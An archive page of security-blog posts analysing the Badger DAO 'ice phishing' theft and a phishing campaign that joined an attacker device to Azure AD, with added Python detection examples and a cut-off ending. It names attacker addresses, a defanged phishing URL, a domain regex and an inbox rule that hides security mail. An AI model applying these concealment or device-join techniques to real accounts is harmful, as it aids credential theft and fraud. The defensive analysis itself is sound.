Archive for the ‘phishing’ Category

‘Ice phishing’ on the blockchain

The technologies that connect us are continually advancing, and while this brings tremendous new capabilities to users, it also opens new attack surfaces for adversaries and abusers. Social engineering represents a class of threats that has extended to virtually every technology that enables human connection. Our recent analysis of a phishing attack connected to the blockchain reaffirms the durability of these threats as well as the need for security fundamentals to be built into related future systems and frameworks.

Credential phishing haunts our customers day in and day out in the web2 world, which is the version of the internet that most of us are familiar with and use today. It’s a profitable business for cybercriminals, even if margins are slim and there’s significant risk associated with monetizing credentials to a business (for example, through human-operated ransomware attacks). Now, imagine if an attacker can – single-handedly – grab a big chunk of the nearly 2.2 trillion US dollar cryptocurrency market capitalization and do so with almost complete anonymity. This changes the dynamics of the game and is exactly what’s happening in the web3 world multiple times a month.

Web3 is the decentralized world that is built on top of cryptographic security that lays the foundation of the blockchain (in contrast, web2 is the more centralized world). In web3, funds you hold in your non-custodial wallet are secured by the private key that is only known to you. Smart contracts you interact with are immutable, often open-source, and audited. How do phishing attacks happen with such a secure foundation?

This is what we will explore in this blog. We will share some necessary background information, and then dive into the Badger DAO attack, a phishing attack that occurred in November-December 2021, during which the attacker was able to steal approximately 121 million US dollars from users.

The Badger DAO attack highlights the need to build security into web3 while it is in its early stages of evolution and adoption. At a high level, we recommend that software developers increase the security usability of web3. In the meantime, end users need to explicitly verify information through additional resources, such as reviewing the project’s documentation and external reputation/informational web sites.

Overview: Web3 concepts

To dissect the attack, we need the necessary background.

Blockchain

The blockchain is a distributed ledger secured by cryptographic algorithms. It can be thought of as a database that shows transfers of cryptocurrency coins from one account to another. The largest blockchains by market capitalization today are Bitcoin and Ethereum. Transactions you submit to a blockchain may modify the ledger, for instance, by transferring cryptocurrency coins from your account to another account.

Blockchains are public, meaning all transactions are visible publicly. Blockchain web front ends (e.g., https://etherscan.io/ for the Ethereum blockchain) exist to explore transactions, accounts, and smart contracts.

Accounts and non-custodial wallets

Accounts are associated with the cryptocurrency coins you may hold. On the blockchain this is represented by an entry in the ledger that transfers cryptocurrency coins from one account to your account. From a set of such entries you can derive account balances.

Wallets visualize the cryptocurrency coins associated with your account. Contrary to popular belief, wallets actually do not hold your cryptocurrency coins. Cryptocurrency coins are stored on the distributed ledger, i.e., the blockchain. A wallet allows you to use its cryptographic keys to sign transactions that take action (e.g., transfer to another account) on the cryptocurrency coins associated with your account. In other words, your cryptographic keys give you access to your cryptocurrency coins. Disclose that key to a different party and your funds may be transferred without your consent.

There are two types of wallets – custodial wallets and non-custodial wallets. The former are wallets associated with cryptocurrency exchanges, whereas the latter is a wallet local to your device. The big difference between the two is who has access and manages the cryptographic keys to sign transactions. Non-custodial wallets provide the owner access to the cryptographic keys, whereas custodial wallets do not.

Smart contracts

Smart contracts are code deployed on the blockchain that can hold cryptocurrency coins and transact. Smart contracts only execute when a regular account (also called an externally owned account (EOA)) or another smart contract triggers their execution.

Smart contract front ends

Triggering the execution of smart contracts is not trivial. One has to (1) create a valid transaction populating its fields appropriately, (2) sign the transaction with one’s private key, and (3) submit the transaction to the blockchain. In order to increase usability, smart contract providers often create a smart contract front end so users can interact with the smart contract using familiar tools, such as a browser (with a non-custodial wallet plugin). In the security context, one must consider the entire front-end stack, including content distribution services.

ERC-20 tokens

ERC-20 tokens are special types of cryptocurrency coins (i.e., tokens) that are implemented via an ERC-20 smart contract, essentially as a balance sheet with a set of functions that allow the transfer of these tokens from one account to another. Each ERC-20 token has its own smart contract that implements the ERC-20 token standard. For example, LINK is a token.

In order to transfer tokens from one account to another, the sender of the transaction needs to be approved to transfer those tokens. The owner of the token is automatically approved for those transactions, but the owner can also delegate approval to additional entities, like smart contracts, so those smart contracts can move funds on behalf of a user. This is required for decentralized finance (DeFi) smart contracts, such as decentralized exchanges (DEXes), as these are used to exchange tokens of different types (e.g., LINK for USDC token on Uniswap V3 DEX).

Decentralized exchange (DEX)

A decentralized exchange (DEX) allows you to trade cryptocurrencies while owning your private key, thus keeping full control of your cryptocurrency. Hardware wallets can be used with DEXs, giving users a higher level of security for a user’s private keys.

Phishing attacks

There are multiple types of phishing attacks in the web3 world. The technology is still nascent, and new types of attacks may emerge. Some attacks look similar to traditional credential phishing attacks observed on web2, but some are unique to web3. One aspect that the immutable and public blockchain enables is complete transparency, so an attack can be observed and studied after it occurred. It also allows assessment of the financial impact of attacks, which is challenging in traditional web2 phishing attacks.

Recall that with the cryptographic keys (usually stored in a wallet), you hold the key to your cryptocurrency coins. Disclose that key to an unauthorized party and your funds may be moved without your consent. Stealing these keys is analogous to stealing credentials to web2 accounts. Web2 credentials are usually stolen by directing users to an illegitimate web site (e.g., a site posing as your bank) through a set of phishing emails.

While attackers can utilize a similar tactic on web3 to get to your private key, given the current adoption, the likelihood of an email landing on the inbox of a cryptocurrency user is relatively low. Instead, different tactics can be employed to reach and trick cryptocurrency users into giving up their private key:

  • Monitoring social media for users reaching out to wallet software support and jumping in with direct messages spoofing support to steal one’s private key directly [2]
  • Distributing new tokens for free to a set of accounts (i.e., “Airdrop” tokens), and then failing transactions on those tokens with an error message to redirect to a phishing website [6] or a website that installs coin mining plugins that steal your credentials from your local device [3]
  • Typosquatting and impersonating legitimate smart contract front ends [4]
  • Impersonating wallet software and stealing private keys directly

The ‘ice phishing’ technique we discuss in this post doesn’t involve stealing one’s private keys. Rather, it entails tricking a user into signing a transaction that delegates approval of the user’s tokens to the attacker. This is a common type of transaction that enables interactions with DeFi smart contracts, as those are used to interact with the user’s tokens (e.g., swaps) as shown in Figure 1. Figures 2 and 3 show what the approval can look like. In this example, we show the initial approval (step 1 in Figure 1), interface, and transaction signature requests that are needed for the Uniswap DEX to exchange USDC tokens for LINK tokens. Note that the spender in the legitimate request is 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45 (the Uniswap V3: Router 2). Once the approval has been granted, it permits the Uniswap V3: Router 2 smart contract to transfer USDC tokens on the user’s behalf to execute the swap (steps 3 and 4 in Figure 1).

Diagram showing an example of a Uniswap flow
Figure 1. Uniswap example flow

Screenshot of a Uniswap approval interface
Figure 2. Uniswap approval interface

Screenshot of an approval transaction signature request
Figure 3. Approval transaction signature request

In an ‘ice phishing’ attack, the attacker merely needs to modify the spender address to the attacker’s address. This can be quite effective because the user interface doesn’t show all the pertinent information that could indicate that the transaction has been tampered with. In the example above, a user isn’t able to tell whether the account to be authorized, 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45 (shown in Figure 3), is indeed the Uniswap V3: Router 2 or an address controlled by the attacker.

Once the approval transaction has been signed, submitted, and mined, the spender can access the funds. In the case of an ‘ice phishing’ attack, the attacker can accumulate approvals over a period of time and then drain all victims’ wallets quickly.
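To make the approval mechanism concrete, here is an added example (not code from this post, and not any real ERC-20 implementation): a toy ERC-20 balance sheet with approve/transferFrom semantics, used to walk through both the legitimate approval described under ERC-20 tokens above and the ‘ice phishing’ variant where only the spender field changes. The Uniswap V3: Router 2 address is the one quoted above; every other address, the balances, and the unlimited-allowance value are constructed placeholders. The spender_is_expected check is the comparison a user or wallet would want to perform before signing, and simulate_revoke shows that setting the allowance back to 0 (the allowance review in the recommendations at the end of the post) closes the door even after a bad approval has been signed.

```python
from dataclasses import dataclass, field

# Real address the post names as the legitimate Uniswap V3: Router 2 spender.
UNISWAP_V3_ROUTER_2 = "0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45"

# Constructed placeholder addresses for the walkthrough (not real accounts).
ALICE = "0xA11CE00000000000000000000000000000000001"
ATTACKER = "0xBAD0000000000000000000000000000000000002"
ATTACKER_CASHOUT = "0xBAD0000000000000000000000000000000000003"
UNLIMITED = 2**256 - 1  # the "unlimited" allowance that many front ends request


class InsufficientAllowance(Exception):
    """Raised when a spender tries to move more than it was approved for."""


@dataclass
class Erc20:
    """Toy ERC-20 balance sheet: balances plus an (owner, spender) -> allowance map."""
    balances: dict = field(default_factory=dict)
    allowances: dict = field(default_factory=dict)

    def balance_of(self, who: str) -> int:
        return self.balances.get(who.lower(), 0)

    def allowance(self, owner: str, spender: str) -> int:
        return self.allowances.get((owner.lower(), spender.lower()), 0)

    def approve(self, owner: str, spender: str, amount: int) -> None:
        # The transaction the victim signs; only the spender field differs
        # between a legitimate swap approval and an ice phishing approval.
        self.allowances[(owner.lower(), spender.lower())] = amount

    def transfer_from(self, caller: str, owner: str, to: str, amount: int) -> None:
        # caller plays msg.sender: it may spend owner's balance up to its allowance.
        allowed = self.allowance(owner, caller)
        if allowed < amount:
            raise InsufficientAllowance(f"{caller} allowed {allowed}, asked {amount}")
        if self.balance_of(owner) < amount:
            raise InsufficientAllowance("owner balance too low")
        self.allowances[(owner.lower(), caller.lower())] = allowed - amount
        self.balances[owner.lower()] = self.balance_of(owner) - amount
        self.balances[to.lower()] = self.balance_of(to) + amount


def spender_is_expected(spender: str, expected: str = UNISWAP_V3_ROUTER_2) -> bool:
    """The check to make before signing: does the spender in the signature
    request equal the contract the front end claims to be using?"""
    return spender.lower() == expected.lower()


def simulate_ice_phishing(initial_balance: int = 1_000) -> tuple:
    """Tampered front end swaps the spender for the attacker; the attacker drains later."""
    usdc = Erc20({ALICE.lower(): initial_balance})
    usdc.approve(ALICE, ATTACKER, UNLIMITED)  # victim signs, believing it is for the router
    usdc.transfer_from(ATTACKER, ALICE, ATTACKER_CASHOUT, initial_balance)  # days later
    return usdc.balance_of(ALICE), usdc.balance_of(ATTACKER_CASHOUT)


def simulate_revoke(initial_balance: int = 1_000) -> int:
    """Allowance review in practice: setting the allowance to 0 blocks a later drain."""
    usdc = Erc20({ALICE.lower(): initial_balance})
    usdc.approve(ALICE, ATTACKER, UNLIMITED)
    usdc.approve(ALICE, ATTACKER, 0)  # revoke before the attacker moves funds
    try:
        usdc.transfer_from(ATTACKER, ALICE, ATTACKER_CASHOUT, 1)
    except InsufficientAllowance:
        return usdc.balance_of(ALICE)
    raise AssertionError("revoked allowance should not permit a transfer")


if __name__ == "__main__":
    print("spender check, legitimate:", spender_is_expected(UNISWAP_V3_ROUTER_2))
    print("spender check, tampered:  ", spender_is_expected(ATTACKER))
    print("after ice phishing (victim, attacker):", simulate_ice_phishing())
    print("after revoke, victim balance:", simulate_revoke())
```

The point the toy makes is that nothing in the signed approval is cryptographically wrong; the private key never leaves the wallet, and the ledger accepts the later transferFrom because the victim genuinely authorized that spender. The only place the tampering is visible is the spender field, which is why the comparison in spender_is_expected has to happen before the signature is produced.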

This is exactly what happened with the Badger DAO attack that enabled the attacker to drain millions of US dollars in November-December 2021.

Badger DAO attack

Badger is a DeFi protocol that allows one to earn interest on Bitcoin deposits; it launched on Ethereum mainnet in December 2020. Users deposit wrapped Bitcoin into vaults that earn yield through a variety of yield farming strategies. Badger currently has 978 million US dollars total value locked (TVL).

Figure 4 shows the timeline of the Badger DAO attack. Badger smart contract front-end infrastructure (in particular, its Cloudflare portion) was compromised (gaining access to a Cloudflare API key), allowing the attacker to inject malicious script into the Badger smart contract front end. This script requested users to sign transactions granting ERC-20 approvals to the attacker’s account (0x1fcdb04d0c5364fbd92c73ca8af9baa72c269107). Note that based on blockchain explorer etherscan, the attacker’s account has been active since 2018 and associated with a variety of phishing-related attacks and cryptocurrency scams (e.g., this transaction hash).

The script was first injected into app.Badger.com on November 10, 2021, but injection was inconsistent, only targeting wallets with a certain balance and modifying the script periodically. Injection stopped on December 2, 2021 at 12:31:37 AM (UTC).

On November 21, 2021, the first funds were transferred by the attacker (possibly a test transaction). On December 2, 2021 at 12:48:25 AM, actual funds were drained from victims’ accounts. This draining of funds continued until 10:35:37 AM that day. Badger paused contracts (where possible) starting at 03:14:00 AM, causing some of the attacker’s transactions to fail. In the end, the attacker was able to drain 121 million US dollars from almost 200 accounts within 10 hours.

Diagram showing the Badger DAO timeline, outlining attacker's actions, the victims' action, the Badger DAO's actions, and the Forta Agent detections.
Figure 4. Badger DAO attack timeline

Detections using Forta

The web3 stack is still nascent and bears risks for users. This ‘ice phishing’ attack was unprecedented in the amount of funds stolen. It currently ranks 6th in the rekt leaderboard of most expensive crypto hacks. Note that the funds drained were mostly from user wallets as opposed to Badger DAO’s smart contracts.

While Badger proceeded with a postmortem and actions to secure infrastructure and unpause contracts [6], attacks like these will likely continue. Fortunately, transactions on the blockchain are public, allowing the identification of these sorts of attacks as early as possible and in an automated way.

Learning from the Badger DAO attack and in order to better detect similar attacks in the future, we have authored and open-sourced an agent on Forta, a real-time threat detection platform for smart contracts. Forta pipes blockchain transactions to the agent for analysis. Our agent monitors transactions for phishing attacks in two stages:

  1. A suspicious ERC-20 approval detector that triggers when an EOA address was granted approvals to multiple ERC-20 contracts. This step of the agent essentially identifies the preparation step (token approvals) of the ‘ice phishing’ attack.
  2. A suspicious ERC-20 transfer detector that triggers when an incriminated EOA address starts transferring funds. This step of the agent alerts when funds are drained from users’ wallets.

Executing the detector on the blocks involved in the Badger DAO attack (blocks 13650638-13726863) would have created the two alerts shown below. These alerts would have been raised well before the attack was noticed manually, as shown in Figure 4. Smart contract providers are able to subscribe to these alerts and possibly integrate them into automated response processes (e.g., pausing smart contracts or disabling the smart contract web front end) via the Forta Explorer, OpenZeppelin’s Defender, or other means. The alerts provide actionable information that can quickly allow incident responders to identify and investigate the attacker’s transactions. For instance, transaction 0x3cad03b779572c11c8188d9660d39ba76d5ae20ec254df89df9c79b5874d17f7 shows attacker 0x1fcdb04d0c5364fbd92c73ca8af9baa72c269107 was granted approval for the bSLP token (smart contract 0x88128580acdd9c04ce47afce196875747bf2a9f6) by victim 0xc610d02270c39a0581fe0137f5e93ae5053d3c66.

Alert 2 on 0x3cad03b779572c11c8188d9660d39ba76d5ae20ec254df89df9c79b5874d17f7 on Nov 20th 2021 08:59:06AM {
  "name": "Suspicious ERC-20 EOA Approvals",
  "description": "0x1fcdb04d0c5364fbd92c73ca8af9baa72c269107 was granted approvals to 2 ERC-20 contracts",
  "alertId": "PHISHING-SUS-ERC20-EOA-APPROVALS",
  "protocol": "ethereum",
  "severity": "High",
  "type": "Suspicious",
  "metadata": {
    "last_contract": "0x88128580acdd9c04ce47afce196875747bf2a9f6",
    "last_tx_hash": "0x3cad03b779572c11c8188d9660d39ba76d5ae20ec254df89df9c79b5874d17f7",
    "last_victim": "0xc610d02270c39a0581fe0137f5e93ae5053d3c66",
    "uniq_approval_contract_count": 2
  }
}

Alert 2 on 0xccc9ea1cbe146e274aff202722307b1443b781af67363bf2f256e0cc39cc1d0a on Nov 21st 2021 11:32:30AM {
  "name": "ERC-20 Transfer by Suspicious Account",
  "description": "0x1fcdb04d0c5364fbd92c73ca8af9baa72c269107 transferred funds from 0x6def55d2e18486b9ddfaa075bc4e4ee0b28c1545 contract to address 0x91d65d67fc573605bcb0b5e39f9ef6e18afa1586",
  "alertId": "PHISHING-SUS-ERC20-EOA-TRANSFERS",
  "protocol": "ethereum",
  "severity": "Critical",
  "type": "Exploit",
  "metadata": {
    "last_contract": "0x6def55d2e18486b9ddfaa075bc4e4ee0b28c1545",
    "last_attacker_address": "0x91d65D67FC573605bCb0b5E39F9ef6E18aFA1586",
    "last_tx_hash": "0xccc9ea1cbe146e274aff202722307b1443b781af67363bf2f256e0cc39cc1d0a",
    "last_victim": "0x38b8F6af1D55CAa0676F1cbB33b344d8122535C2"
  }
}
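The two-stage logic above can be expressed as a small stateful detector. The following is an added example written for this post, not the open-sourced Forta agent itself: it consumes decoded ERC-20 Approval and Transfer events one at a time, tracks how many distinct token contracts have approved a given EOA (stage 1), and, once that EOA is incriminated, flags any transaction it sends that moves another account’s balance (stage 2). The alert names and alertIds are taken from the alerts shown above; the threshold of 2 contracts, the event field names, the spender_is_eoa flag (in a real agent this would come from checking whether the spender address carries code), and all sample addresses and transaction hashes are constructed assumptions.

```python
from collections import defaultdict

# Assumed threshold: the post's first alert fired once an EOA held approvals on 2 contracts.
APPROVAL_THRESHOLD = 2


class IcePhishingDetector:
    """Stateful two-stage detector fed one decoded ERC-20 event at a time."""

    def __init__(self, threshold: int = APPROVAL_THRESHOLD):
        self.threshold = threshold
        self.approvals = defaultdict(set)  # spender EOA -> ERC-20 contracts that approved it
        self.incriminated = set()          # EOAs that crossed the threshold
        self.alerts = []

    def handle(self, ev: dict) -> list:
        """Process one event; return the alerts (if any) it produced."""
        new = []
        if ev["event"] == "Approval" and ev["spender_is_eoa"]:
            # Stage 1: preparation. Approvals to contracts (DEX routers) are routine;
            # a single EOA collecting approvals across several token contracts is not.
            contracts = self.approvals[ev["spender"]]
            contracts.add(ev["contract"])
            if len(contracts) >= self.threshold and ev["spender"] not in self.incriminated:
                self.incriminated.add(ev["spender"])
                new.append({
                    "name": "Suspicious ERC-20 EOA Approvals",
                    "alertId": "PHISHING-SUS-ERC20-EOA-APPROVALS",
                    "severity": "High",
                    "description": f"{ev['spender']} was granted approvals to {len(contracts)} ERC-20 contracts",
                    "metadata": {
                        "last_contract": ev["contract"],
                        "last_tx_hash": ev["tx_hash"],
                        "last_victim": ev["owner"],
                        "uniq_approval_contract_count": len(contracts),
                    },
                })
        elif ev["event"] == "Transfer" and ev["tx_from"] in self.incriminated and ev["from"] != ev["tx_from"]:
            # Stage 2: draining. The incriminated EOA sends a transaction that moves
            # someone else's balance (a transferFrom), so the victim is ev["from"].
            new.append({
                "name": "ERC-20 Transfer by Suspicious Account",
                "alertId": "PHISHING-SUS-ERC20-EOA-TRANSFERS",
                "severity": "Critical",
                "description": f"{ev['tx_from']} transferred funds from {ev['contract']} contract to address {ev['to']}",
                "metadata": {
                    "last_contract": ev["contract"],
                    "last_attacker_address": ev["to"],
                    "last_tx_hash": ev["tx_hash"],
                    "last_victim": ev["from"],
                },
            })
        self.alerts.extend(new)
        return new


# Constructed events with placeholder addresses (nothing here is a real account or tx).
ROUTER, ATTACKER, CASHOUT = "0xROUTER_CONTRACT", "0xEOA_ATTACKER", "0xEOA_CASHOUT"
VICTIM_1, VICTIM_2, BYSTANDER = "0xEOA_VICTIM_1", "0xEOA_VICTIM_2", "0xEOA_BYSTANDER"
TOKEN_A, TOKEN_B = "0xTOKEN_A", "0xTOKEN_B"

SAMPLE_EVENTS = [
    {"event": "Approval", "block": 100, "tx_hash": "0xtx1", "contract": TOKEN_A,
     "owner": VICTIM_1, "spender": ROUTER, "spender_is_eoa": False},   # normal DEX approval
    {"event": "Approval", "block": 101, "tx_hash": "0xtx2", "contract": TOKEN_A,
     "owner": VICTIM_1, "spender": ATTACKER, "spender_is_eoa": True},  # ice phishing approval 1
    {"event": "Approval", "block": 105, "tx_hash": "0xtx3", "contract": TOKEN_B,
     "owner": VICTIM_2, "spender": ATTACKER, "spender_is_eoa": True},  # approval 2 -> stage 1 alert
    {"event": "Transfer", "block": 106, "tx_hash": "0xtx4", "contract": TOKEN_A,
     "tx_from": BYSTANDER, "from": BYSTANDER, "to": VICTIM_2},         # ordinary transfer, no alert
    {"event": "Transfer", "block": 130, "tx_hash": "0xtx5", "contract": TOKEN_A,
     "tx_from": ATTACKER, "from": VICTIM_1, "to": CASHOUT},            # draining -> stage 2 alert
]


def run_demo() -> list:
    """Replay the constructed events and return every alert raised."""
    det = IcePhishingDetector()
    for ev in SAMPLE_EVENTS:
        det.handle(ev)
    return det.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert["alertId"], alert["description"])
```

The gap between block 105 and block 130 in the constructed stream is the window the post describes: approvals are collected quietly over days, and the stage 1 alert is the one that buys responders time, because nothing has been lost yet when it fires.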

Recommendations

Here are some recommendations end users could follow to protect themselves against threats like the Badger DAO attack. Note that these recommendations put a lot of burden on the users; we encourage web3 projects and wallet providers to increase usability to help users perform these actions:

  1. Review the smart contract you are interacting with.
  2. Is the contract address correct? Unfortunately, one can’t rely on the smart contract front-end to interact with the right smart contract. One needs to check the contract address that appears in the transaction to be signed before it is submitted. This is an area where wallet providers can innovate and add a layer of security.
  3. Has the smart contract been audited? Several web sites can help with that assessment, such as defiyield.
  4. Is the contract upgradable (in other words, is it implemented as a proxy pattern) such that when bugs are uncovered, the project can deploy fixes? Etherscan’s contract tab shows whether a smart contract has been implemented as a proxy.
  5. Does the smart contract have incident response or emergency capabilities, like pause/unpause? Under what conditions are these triggered?
  6. What are the security characteristics of the smart contract after deployment? CertiK Skynet tracks post-deployment security intelligence through on-chain monitoring.
  7. Manage your cryptocurrencies and tokens through multiple wallets and/or periodically review and revoke token allowances. https://etherscan.io/tokenapprovalchecker makes doing this easy.

For project developers, smart contract audits are a necessary first step, but audits need to expand to the entire infrastructure and incident response processes. After deployment, monitoring (e.g., through Forta or CertiK) may give you the time to prevent or limit an exploit draining funds. Lastly, we recommend ensuring that all your audit and security incident response processes are documented in a dedicated section on the project’s website.

The ‘ice phishing’ attack in late 2021 that we analyzed in this blog is just one example of the threats affecting blockchain technology today. Since then, many more hacks have occurred that impacted blockchain projects and users. In this blog we described possible ways to identify these attacks quickly and enumerated a set of security practices that project developers and users can follow. Blockchain technology is developing rapidly, and with broader adoption on the horizon, we encourage researchers to continue examining this emerging tech, sharing findings with the broader community, and helping improve security through both secure code and informed security products.

Christian Seifert
Microsoft 365 Defender Research Team

Further reading

  1. Web2 vs Web3
  2. Common scams and how to avoid them
  3. Hunting Huobi, MyEtherWallet, and Blockchain.info Scams
  4. Read that link carefully: Scammers scoop up misspelled cryptocurrency URLs to rob your wallet
  5. Update: Transaction Error Messages
  6. Phisher Watch: Airdrop Scams
  7. BadgerDAO Exploit Technical Post Mortem

The post ‘Ice phishing’ on the blockchain appeared first on Microsoft Security Blog.

Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA

We have recently uncovered a large-scale, multi-phase campaign that adds a novel technique to traditional phishing tactics by joining an attacker-operated device to an organization’s network to further propagate the campaign. We observed that the second stage of the campaign was successful against victims that did not implement multifactor authentication (MFA), an essential pillar of identity security. Without additional protective measures such as MFA, the attack takes advantage of the concept of bring-your-own-device (BYOD) via the ability to register a device using freshly stolen credentials.

The first campaign phase involved stealing credentials in target organizations located predominantly in Australia, Singapore, Indonesia, and Thailand. Stolen credentials were then leveraged in the second phase, in which attackers used compromised accounts to expand their foothold within the organization via lateral phishing as well as beyond the network via outbound spam.

Connecting an attacker-controlled device to the network allowed the attackers to covertly propagate the attack and move laterally throughout the targeted network. While in this case device registration was used for further phishing attacks, leveraging device registration is on the rise as other use cases have been observed. Moreover, the immediate availability of pen testing tools, designed to facilitate this technique, will only expand its usage across other actors in the future.

MFA, which prevents attackers from being able to use stolen credentials to gain access to devices or networks, foiled the campaign for most targets. For organizations that did not have MFA enabled, however, the attack progressed.

Diagram showing the multi-phase phishing attack chain
Figure 1. Multi-phase phishing attack chain

Phishing continues to be the most dominant means for attacking enterprises to gain initial entry. This campaign shows that the continuous improvement of visibility and protections on managed devices has forced attackers to explore alternative avenues. The potential attack surface is further broadened by the increase in employees who work from home, which shifts the boundaries between internal and external corporate networks. Attackers deploy various tactics to target organizational issues inherent with hybrid work, human error, and “shadow IT” or unmanaged apps, services, devices, and other infrastructure operating outside standard policies.

These unmanaged devices are often ignored or missed by security teams at join time, making them lucrative targets for compromising, quietly performing lateral movements, jumping network boundaries, and achieving persistence for the sake of launching broader attacks. Even more concerning, as our researchers uncovered in this case, is when attackers manage to successfully connect a device that they fully operate and is in their complete control.

To fend off the increasing sophistication of attacks as exemplified by this attack, organizations need solutions that deliver and correlate threat data from email, identities, cloud, and endpoints. Microsoft 365 Defender coordinates protection across these domains, automatically finding links between signals to provide comprehensive defense. Through this cross-domain visibility, we were able to uncover this campaign. We detected the anomalous creation of inbox rules, traced it back to an initial wave of the phishing campaign, and correlated data to expose the attackers’ next steps, namely device registration and the subsequent phishing campaign.

Screenshot of Microsoft 365 Defender alert for Suspicious device registration following phishing
Figure 2. Microsoft 365 Defender alert “Suspicious device registration following phishing”

This attack shows the impact of an attacker-controlled unmanaged device that may become part of a network when credentials are stolen and Zero Trust policies are not in place. Microsoft Defender for Endpoint provides a device discovery capability that helps organizations to find certain unmanaged devices operated by attackers whenever they start having network interactions with servers and other managed devices. Once discovered and onboarded, these devices can then be remediated and protected.

Screenshot of Microsoft Defender for Endpoint device discovery page
Figure 3. Microsoft Defender for Endpoint device discovery

In this blog post, we share the technical aspects of a large-scale, multi-phase phishing campaign. We detail how attackers used the first attack wave to compromise multiple mailboxes throughout various organizations and implement an inbox rule to evade detection. This was then followed by a second attack wave that abused one organization’s lack of MFA protocols to register the attackers’ unmanaged device and propagate the malicious messages via lateral, internal, and outbound spam.

First wave and rule creation

The campaign leveraged multiple components and techniques to quietly compromise accounts and propagate the attack. Using Microsoft 365 Defender threat data, we found the attack’s initial compromise vector to be a phishing campaign. Our analysis found that the recipients received a DocuSign-branded phishing email, displayed below:

Screenshot of a sample email used in the first stage of the attack
Figure 4. First-stage phishing email spoofing DocuSign

The attacker used a set of phishing domains registered under the .xyz top-level domain. The URL domain can be described with the following regular expression:

UrlDomain matches regex @"^[a-z]{5}\.ar[a-z]{4,5}\.xyz"

The phishing link was uniquely generated for each email, with the victim’s email address encoded in the query parameter of the URL. After clicking the link, the victim was redirected to a phishing website at newdoc-lnpye[.]ondigitalocean[.]app, which imitated the login page for Office 365. The fake login page was pre-filled with the targeted victim’s username and prompted them to enter their password. This technique increased the likelihood that the victim viewed the website as being legitimate and trustworthy.

Screenshot of the phishing page showing the username prepopulated
Figure 5. Phishing page with username prepopulated

Next, we detected that the victim’s stolen credentials were immediately used to establish a connection with Exchange Online PowerShell, most likely using an automated script as part of a phishing kit. Leveraging the Remote PowerShell connection, the attacker implemented an inbox rule via the New-InboxRule cmdlet that deleted certain messages based on keywords in the subject or body of the email message. The inbox rule allowed the attackers to avoid arousing the compromised users’ suspicions by deleting non-delivery reports and IT notification emails that might have been sent to the compromised user.

During our investigation of the first stage of this campaign, we saw over one hundred compromised mailboxes in multiple organizations with inbox rules consistently fitting the pattern below:

Mailbox rule name: Spam Filter
Condition: SubjectOrBodyContainsWords: “junk;spam;phishing;hacked;password;with you”
Action: DeleteMessage, MarkAsRead

While multiple users within various organizations were compromised in the first wave, the attack did not progress past this stage for the majority of targets as they had MFA enabled. The attack’s propagation heavily relied on a lack of MFA protocols. Enabling MFA for Office 365 applications or while registering new devices could have disrupted the second stage of the attack chain.

Device registration and second wave phishing

One account belonging to an organization without MFA enabled was further abused to expand the attackers’ foothold and propagate the campaign. More specifically, the attack abused the organization’s lack of MFA enforcement to join a device to its Azure Active Directory (AD) instance, or possibly to enroll into a management provider like Intune to enforce the organization’s policies based on compliant devices.

In this instance, the attackers first installed Outlook onto their own Windows 10 machine. This attacker-owned device was then successfully connected to the victim organization’s Azure AD, possibly by simply accepting Outlook’s first launch experience prompt to register the device by using the stolen credentials. An Azure AD MFA policy would have halted the attack chain at this stage. Though for the sake of comprehensiveness, it should be noted that some common red team tools, such as AADInternals and the command Join-AADIntDeviceToAzureAD, can be used to achieve similar results in the presence of a stolen token and lack of strong MFA policies.

Azure AD evaluates and triggers an activity timestamp when a device attempts to authenticate, which can be reviewed to discover freshly registered devices. In our case, this includes a Windows 10 device either Azure AD joined or hybrid Azure AD joined and active on the network. The activity timestamp can be found by either using the Get-AzureADDevice cmdlet or the Activity column on the devices page in the Azure portal. Once a timeframe is defined and a potential rogue device is identified, the device can be deleted from Azure AD, preventing access to resources using the device to sign in.
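The three signals described so far (a click on a first-wave URL, a New-InboxRule call matching the rule pattern, and a device registration shortly afterwards) are exactly the kind of events a defender would want to chain per user. The following is an added example, not Microsoft 365 Defender’s detection logic: it applies the domain regular expression quoted above, scores an inbox rule against the observed keyword and action pattern, and correlates the signals in time. The audit records are constructed, their field names are assumptions rather than any product’s schema, the correlation windows and keyword-overlap threshold are tuning choices for the example, and only the title “Suspicious device registration following phishing” is taken from the post; the other incident title is constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Domain pattern the post gives for the first-stage phishing links.
URL_DOMAIN_RE = re.compile(r"^[a-z]{5}\.ar[a-z]{4,5}\.xyz")

# Inbox rule pattern observed in the post (keywords and actions).
CAMPAIGN_RULE_WORDS = {"junk", "spam", "phishing", "hacked", "password", "with you"}
CAMPAIGN_RULE_ACTIONS = {"DeleteMessage", "MarkAsRead"}

# Assumed tuning: keyword overlap that counts as a match, and how close in
# time the signals must be to be chained into one incident.
MIN_KEYWORD_OVERLAP = 3
RULE_WINDOW = timedelta(hours=24)
DEVICE_WINDOW = timedelta(hours=72)

DEVICE_ALERT = "Suspicious device registration following phishing"  # title quoted in the post
RULE_ALERT = "Suspicious inbox rule following phishing (constructed title)"


def url_domain_matches_campaign(domain: str) -> bool:
    """True when a URL host fits the .xyz pattern used by the first wave."""
    return URL_DOMAIN_RE.match(domain) is not None


def inbox_rule_is_suspicious(rule: dict) -> bool:
    """Flag New-InboxRule parameters that silently delete mail about account compromise."""
    words = {w.strip().lower() for w in rule["SubjectOrBodyContainsWords"].split(";")}
    overlap = len(words & CAMPAIGN_RULE_WORDS)
    return overlap >= MIN_KEYWORD_OVERLAP and CAMPAIGN_RULE_ACTIONS <= set(rule["actions"])


def correlate(events: list) -> list:
    """Chain phishing click -> suspicious rule -> device registration per user."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_user[ev["user"]].append(ev)

    incidents = []
    for user, evs in by_user.items():
        clicks = [e for e in evs if e["kind"] == "url_click" and url_domain_matches_campaign(e["domain"])]
        rules = [e for e in evs if e["kind"] == "inbox_rule" and inbox_rule_is_suspicious(e["rule"])]
        devices = [e for e in evs if e["kind"] == "device_registered"]
        for click in clicks:
            rule = next((r for r in rules if click["time"] <= r["time"] <= click["time"] + RULE_WINDOW), None)
            if rule is None:
                continue  # click alone: credentials may be phished, but no post-compromise activity seen
            device = next((d for d in devices if rule["time"] <= d["time"] <= rule["time"] + DEVICE_WINDOW), None)
            incidents.append({
                "user": user,
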